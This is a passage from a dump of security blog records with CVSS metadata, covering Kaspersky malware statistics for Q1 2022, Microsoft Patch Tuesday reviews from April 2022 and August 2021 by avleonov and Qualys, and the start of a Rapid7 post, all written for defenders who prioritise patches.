It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2022, our File Anti-Virus detected **58,989,058** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **%**** \n---|---|--- \n1 | Yemen | 48.38 \n2 | Turkmenistan | 47.53 \n3 | Tajikistan | 46.88 \n4 | Cuba | 45.29 \n5 | Afghanistan | 42.79 \n6 | Uzbekistan | 41.56 \n7 | Bangladesh | 41.34 \n8 | South Sudan | 39.91 \n9 | Ethiopia | 39.76 \n10 | Myanmar | 37.22 \n11 | Syria | 36.89 \n12 | Algeria | 36.02 \n13 | Burundi | 34.13 \n14 | Benin | 33.81 \n15 | Rwanda | 33.11 \n16 | Sudan | 32.90 \n17 | Tanzania | 32.39 \n18 | Kyrgyzstan | 32.26 \n19 | Venezuela | 32.00 \n20 | Iraq | 31.93 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231744/13-en-malware-report-q1-2022-pc.png>))_\n\nOverall, 15.48% of user computers globally faced at least one 
Malware-class local threat during Q1. Russia scored 16.88% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-27T08:00:05", "type": "securelist", "title": "IT threat evolution in Q1 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-40444", "CVE-2022-0604", "CVE-2022-0605", "CVE-2022-0606", "CVE-2022-0609", "CVE-2022-0847", "CVE-2022-1096", "CVE-2022-21836", "CVE-2022-21882", "CVE-2022-21919", "CVE-2022-22947", "CVE-2022-22965"], "modified": "2022-05-27T08:00:05", "id": "SECURELIST:11665FFD7075FB9D59316195101DE894", "href": "https://securelist.com/it-threat-evolution-in-q1-2022-non-mobile-statistics/106531/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-04-23T12:23:39", "description": "Hello everyone! This episode will be about Microsoft Patch Tuesday for April 2022 and new improvements in my [Vulristics](<https://github.com/leonov-av/vulristics>) project. I decided to add more comment sources. 
Because it's not just Tenable, Qualys, Rapid7 and ZDI that make Microsoft Patch Tuesday reviews, but also other security companies and bloggers. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239085>\n\nYou can see them in my automated security news telegram channel [avleonovnews](<https://t.me/avleonovnews>) after every second Tuesday of the month. So, now you can add any links with CVE comments to Vulristics.\n\nFor April Patch Tuesday I will add these sources:\n\n * [Kaspersky](<https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/>)\n * [KrebsOnSecurity](<https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/>)\n * [ComputerWeekly](<https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs>)\n * [TheHackersNews](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>)\n * [Threatpost](<https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/>)\n\nLet's see if they highlight different sets of vulnerabilities.\n \n \n $ cat comments_links.txt\n Qualys|April 2022 Patch Tuesday: Microsoft Releases 145 Vulnerabilities with 10 Critical; Adobe Releases 4 Advisories, 78 Vulnerabilities with 51 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday\n ZDI|THE APRIL 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review\n Kaspersky|A bunch of vulnerabilities in Windows, one already exploited|https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/\n KrebsOnSecurity|Microsoft Patch Tuesday, April 2022 Edition|https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/\n ComputerWeekly|Microsoft patches two zero-days, 10 critical bugs|https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs\n TheHackersNews|Microsoft Issues Patches for 2 Windows Zero-Days 
and 126 Other Vulnerabilities|https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html\n Threatpost|Microsoft Zero-Days, Wormable Bugs Spark Concern|https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/\n\nI have also added links to [Qualys](<https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday>) and [ZDI](<https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review>) blogposts. Qualys didn't fix their blog search (apparently no one uses it). ZDI doesn't have a blog search, and duckduckgo stopped indexing them properly. \n\nIn addition, Tenable closed access to their [tenable.com](<http://tenable.com>). This is rather ironic considering that [Russian Tenable Security Day](<https://tenable-day.tiger-optics.ru/>) took place on February 10, 2022, just two months ago. [I participated in it](<https://www.youtube.com/watch?v=V5T3ftcFwdY>). It was a formal event with [Tenable's EMEA CTO and Regional Manager](<https://t.me/avleonovcom/961>). And now we are not talking about any support, updates and licenses for Russian companies and individuals, but even about access to the Tenable website. This is how the situation can change rapidly, if you trust Western vendors. Try not to do this.\n\nBut in any case, you can still use the Tenable blog as a source of comments about Patch Tuesday vulnerabilities. 
I have added socks proxy support to Vulristics.\n \n \n vulners_key = \"SFKJKEWRID2JFIJ...AAK3DHKSJD\"\n proxies = {\n 'http': \"socks5://<host>:<port>\",\n 'https': \"socks5://<host>:<port>\"\n }\n\nI run the command like this:\n \n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"April\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n\nJust like last month, I'm taking into account not only the vulnerabilities published on April 11 (117 CVEs), but also all the vulnerabilities since last Patch Tuesday (40 CVEs). There are a total of 157 CVEs in the report.\n \n \n MS PT Year: 2022\n MS PT Month: April\n MS PT Date: 2022-04-12\n MS PT CVEs found: 117\n Ext MS PT Date from: 2022-03-09\n Ext MS PT Date to: 2022-04-11\n Ext MS PT CVEs found: 40\n ALL MS PT CVEs: 157\n\n * Critical: 5\n * High: 51\n * Medium: 91\n * Low: 10\n\nLet's start with the critical ones:\n\n * **Elevation of Privilege** - Windows Common Log File System Driver ([CVE-2022-24521](<https://vulners.com/cve/CVE-2022-24521>)). Exploitation in the wild is mentioned in AttackerKB and Microsoft. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Functional Exploit). Since this vulnerability only allows a privilege escalation, it is likely paired with a separate code execution bug. This vulnerability was reported by the US National Security Agency.\n * **Remote Code Execution** - Remote Procedure Call Runtime ([CVE-2022-26809](<https://vulners.com/cve/CVE-2022-26809>)). An unauthenticated, remote attacker could exploit this vulnerability by sending \u201ca specially crafted RPC call to an RPC host.\u201d The vulnerability could allow a remote attacker to execute code at high privileges on an affected system. Since no user interaction is required, these factors combine to make this wormable, at least between machines where RPC can be reached. 
A proof of concept of this vulnerability [is available on github](<https://github.com/XmasSnow1/cve-2022-26809>). Other RCEs in RPC ([CVE-2022-24492](<https://vulners.com/cve/CVE-2022-24492>), [CVE-2022-24528](<https://vulners.com/cve/CVE-2022-24528>)) were also classified as Critical, but this is due to misattribution of exploits. The only exploitable one is [CVE-2022-26809](<https://vulners.com/githubexploit/706a6eeb-1d07-53eb-8455-f7809863dadc>). \n * **Remote Code Execution** - Microsoft Edge ([CVE-2022-1096](<https://vulners.com/cve/CVE-2022-1096>)). In the Vulristics report it was detected as **Unknown Vulnerability Type** because it's impossible to detect the vulnerability type by description. "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information. Google is aware that an exploit for CVE-2022-1096 exists in the wild." In fact it is a well-known 0day RCE in Chrome, that affected all other Chromium-based browsers. Exploitation in the wild is mentioned in AttackerKB. The Vulristics report states that "Public exploit is found at Vulners". However, it's just a "Powershell script that dumps Chrome and Edge version to a text file in order to determine if you need to update due to CVE-2022-1096". Yes, it is difficult to determine what exactly was uploaded on github.\n\nNow let's see the most interesting vulnerabilities with the High level.\n\n * **Elevation of Privilege** - Windows User Profile Service ([CVE-2022-26904](<https://vulners.com/cve/CVE-2022-26904>)). This vulnerability was supposed to have been fixed in the August 2021 update, when it was tracked as CVE-2021-34484. However, the researcher who discovered it later discovered a bypass, and then when that was fixed again in January, he went and bypassed it a second time. 
Not only is a PoC out there for it, there\u2019s a [Metasploit module](<https://vulners.com/metasploit/msf:exploit/windows/local/cve_2022_26904_superprofile/>) as well. This privilege escalation vulnerability allows an attacker to gain code execution at SYSTEM level on affected systems. The vulnerability relies on winning a race condition, which can be tricky to reliably achieve.\n * **Information Disclosure** - Windows Kernel ([CVE-2022-24483](<https://vulners.com/cve/CVE-2022-24483>)). Little is known about this vulnerability and no one has highlighted this vulnerability, but there is a [PoC for it on github](<https://github.com/waleedassar/CVE-2022-24483>).\n * **Remote Code Execution** - Windows DNS Server ([CVE-2022-26812](<https://vulners.com/cve/CVE-2022-26812>), [CVE-2022-26814](<https://vulners.com/cve/CVE-2022-26814>), [CVE-2022-26829](<https://vulners.com/cve/CVE-2022-26829>)). Also, no one highlighted this vulnerability. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Proof-of-Concept Exploit). There were 18(!) DNS Server bugs receiving patches this month.\n\nFor the remaining vulnerabilities, there is neither a sign of exploitation in the wild, nor a sign of a public exploit. Let's see the most interesting ones.\n\n * **Remote Code Execution** - Windows SMB ([CVE-2022-24500](<https://vulners.com/cve/CVE-2022-24500>)). This vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. Exploitability Assessment: Exploitation Less Likely. **Remote Code Execution** - Windows Kernel ([CVE-2022-24541](<https://vulners.com/cve/CVE-2022-24541>)) is actually a similar SMB vulnerability as well.\n * **Remote Code Execution** - Windows Network File System ([CVE-2022-24491](<https://vulners.com/cve/CVE-2022-24491>), [CVE-2022-24497](<https://vulners.com/cve/CVE-2022-24497>)). 
An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution. NOTE: This vulnerability is only exploitable for systems that have the NFS role enabled. Exploitability Assessment: Exploitation More Likely.\n\nAs you can see, additional sources of comments actually repeat everything that ZDI, Qualys, Rapid7 and Tenable highlight, but sometimes they add interesting details about vulnerabilities.\n\nThe full report is available: [ms_patch_tuesday_april2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-23T09:22:32", "type": "avleonov", "title": "Microsoft Patch Tuesday April 2022 and custom CVE comments sources in Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-1096", "CVE-2022-24483", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24528", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26812", 
"CVE-2022-26814", "CVE-2022-26829", "CVE-2022-26904"], "modified": "2022-04-23T09:22:32", "id": "AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692", "href": "https://avleonov.com/2022/04/23/microsoft-patch-tuesday-april-2022-and-custom-cve-comments-sources-in-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-08-21T10:10:11", "description": "### Microsoft Patch Tuesday \u2013 August 2021\n\nMicrosoft patched 51 vulnerabilities in their August 2021 Patch Tuesday release, and 7 of them are rated as critical severity. Three 0-day vulnerability patches were included in the release.\n\n#### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n\nAn unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate against another server using NTLM. A malicious user can use this attack to take complete control over a Windows domain. Per Microsoft, this vulnerability affects all servers, but domain controllers should be prioritized in terms of applying security updates.\n\n[CVE-2021-34481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>) \u2013 Windows Print Spooler Remote Code Execution Vulnerability\n\nA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. 
This Patch Tuesday Microsoft released security updates to address this vulnerability and should be prioritized.\n\n#### Three 0-Day Vulnerabilities Patched\n\n * [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36936>) - Windows Print Spooler Remote Code Execution Vulnerability\n * [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n * [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948>) - Windows Update Medic Service Elevation of Privilege Vulnerability - This has been actively exploited, per Microsoft.\n\n#### Qualys QIDs Providing Coverage\n\n**QID**| **Title**| **Severity**| **CVE ID** \n---|---|---|--- \n110388| Microsoft SharePoint Enterprise Server Multiple Vulnerabilities August 2021| Medium| [_CVE-2021-36940_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36940>) \n110389| Microsoft Office and Microsoft Office Services and Web Apps Security Update August 2021 | High| [_CVE-2021-34478_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34478>), [_CVE-2021-36941_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36941>) \n375798| Microsoft Azure CycleCloud Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-33762_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33762>), [_CVE-2021-36943_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36943>), [_KB3142345_](<https://www.microsoft.com/en-us/download/details.aspx?id=103313>) \n91801| Microsoft Dynamics Business Central Cross-Site (XSS) Scripting Vulnerability August 2021 | Medium | [_CVE-2021-36946_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36946>) \n91802| Microsoft Windows Security Update for August 2021 \n \n | High| CVE-2021-26424, [_CVE-2021-26425_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26425>), 
[_CVE-2021-26426_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26426>), [_CVE-2021-26431_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26431>), [_CVE-2021-26432_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26432>), [_CVE-2021-26433_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26433>), [_CVE-2021-34480_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34480>), [_CVE-2021-34483_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34483>), [_CVE-2021-34484_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34484>), [_CVE-2021-34486_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34486>), [_CVE-2021-34487_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34487>), [_CVE-2021-34530_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34530>), [_CVE-2021-34533_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34533>), [_CVE-2021-34534_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34534>), [_CVE-2021-34535_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34535>), [_CVE-2021-34536_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34536>), [_CVE-2021-34537_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34537>), [_CVE-2021-36926_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36926>), [_CVE-2021-36927_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36927>), [_CVE-2021-36932_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36932>), [_CVE-2021-36933_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36933>), [_CVE-2021-36936_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36936>), [_CVE-2021-36937_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36937>), [_CVE-2021-36938_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36938>), [_CVE-2021-36947_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36947>), 
[_CVE-2021-36948_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36948>) \n91803| Microsoft Windows Local Security Authority (LSA) Spoofing Vulnerability August 2021 | High| [_CVE-2021-36942_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36942>) \n91804| Microsoft Windows Defender Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-34471_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34471>) \n91805| Microsoft Windows 10 Update Assistant Elevation of Privilege Vulnerability August 2021 | Medium | [_CVE-2021-36945_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36945>) \n91806| Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability August 2021 | Medium| [_CVE-2021-36949_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36949>) \n91774| Microsoft .NET Core and ASP.NET Core Security Update for August 2021 | High| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n91809| Microsoft Visual Studio Security Update for August 2021 | Medium| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n \n### Adobe Patch Tuesday \u2013 August 2021\n\nAdobe addressed 29 CVEs this Patch Tuesday impacting Adobe Connect and Magento product. 
The patches for Magento are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\n**Adobe Security Bulletin**| **QID**| **Severity**| **CVE ID** \n---|---|---|--- \nAdobe Connect Multiple Vulnerabilities (APSB21-66) | 730152| Medium| [CVE-2021-36061](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36061>), [CVE-2021-36062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36062>), [CVE-2021-36063](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36063>) \n \n### Discover Patch Tuesday Vulnerabilities in VMDR\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://success.qualys.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Vulnerabilities and Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This Month in Vulnerabilities and Patches_](<https://www.brighttalk.com/webcast/11673/502309>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * Microsoft Patch Tuesday, August 2021\n * Adobe Patch Tuesday, August 2021\n\n[Join us live or watch on demand!](<https://www.brighttalk.com/webcast/11673/502309>)\n\n[Webinar August 12, 2021 or on demand](<https://www.brighttalk.com/webcast/11673/502309>).\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T19:58:49", "type": "qualysblog", "title": "Microsoft and Adobe Patch Tuesday (August 2021) \u2013 Microsoft 51 Vulnerabilities with 7 Critical, Adobe 29 Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26423", "CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-33762", "CVE-2021-34471", "CVE-2021-34478", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34485", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34532", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36061", "CVE-2021-36062", "CVE-2021-36063", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36940", "CVE-2021-36941", "CVE-2021-36942", "CVE-2021-36943", "CVE-2021-36945", "CVE-2021-36946", "CVE-2021-36947", "CVE-2021-36948", "CVE-2021-36949"], "modified": "2021-08-10T19:58:49", "id": "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-08-21T10:49:33", "description": "\n\nHot off the 
press, it\u2019s another issue of the Patch Tuesday blog! While the number of vulnerabilities is low this month, there are a number of high risk items administrators will want to patch right away including a few that will require additional remediation steps. This Patch Tuesday also includes updates for three vulnerabilities that were publicly disclosed earlier this month. Let\u2019s jump in.\n\n## Windows Elevation of Privilege Vulnerability aka HiveNightmare/SeriousSAM\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934> \nWith a public proof-of-concept having been available for some time, administrators should prioritize taking action on CVE-2021-36934. Remediation for this vulnerability requires volume shadow copies for system files to be deleted. This is due to the nature of the vulnerability, as the files with the vulnerable permissions could be restored from a backup and accessed even after the patch is installed. Microsoft indicates they took caution not to delete users' backups, but the trade-off is that customers will need to do the chore themselves. We've updated [our blog post](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>) with this additional information.\n\n## Windows LSA Spoofing Vulnerability aka ADV210003\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942> \nAnother high priority action for patching teams is CVE-2021-36942. This update patches one of the vectors used in the PetitPotam attack. After applying this update there are additional configurations required in order to protect systems from other attack vectors using registry keys. The InsightVM team has included detection for the registry keys needed to enable EPA and SMB Signing in addition to the normal update. 
Please see [our blog post](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) for more information.\n\n## Windows Services for NFS ONCRPC XDR Driver Remote Code Execution Vulnerability\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26432> \nWhile Microsoft has not offered up any details for this vulnerability we can glean some info from the CVSS information. This remote code execution vulnerability is reachable from the network service with no authentication or user action required. There may not be an exploit available for this yet, but Microsoft indicates that \u201cExploitation [is] more likely\u201d. Put this update near the top of your TODO list.\n\n## Windows TCP/IP Remote Code Execution Vulnerability\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26424> \nLast on our list is a vulnerability that can result in remote execution on a Hyper-V host via the IPv6 networking stack. If Hyper-V is used in your environment this should be first on your list this month. 
\n\n## Summary Graphs\n\n\n\n## Summary Tables\n\n## Azure Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36949](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36949>) | Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability | No | No | 7.1 | Yes \n[CVE-2021-26428](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26428>) | Azure Sphere Information Disclosure Vulnerability | No | No | 4.4 | Yes \n[CVE-2021-26429](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26429>) | Azure Sphere Elevation of Privilege Vulnerability | No | No | 7.7 | Yes \n[CVE-2021-26430](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26430>) | Azure Sphere Denial of Service Vulnerability | No | No | 6 | Yes \n[CVE-2021-33762](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33762>) | Azure CycleCloud Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36943](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36943>) | Azure CycleCloud Elevation of Privilege Vulnerability | No | No | 4 | No \n \n## Browser Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- 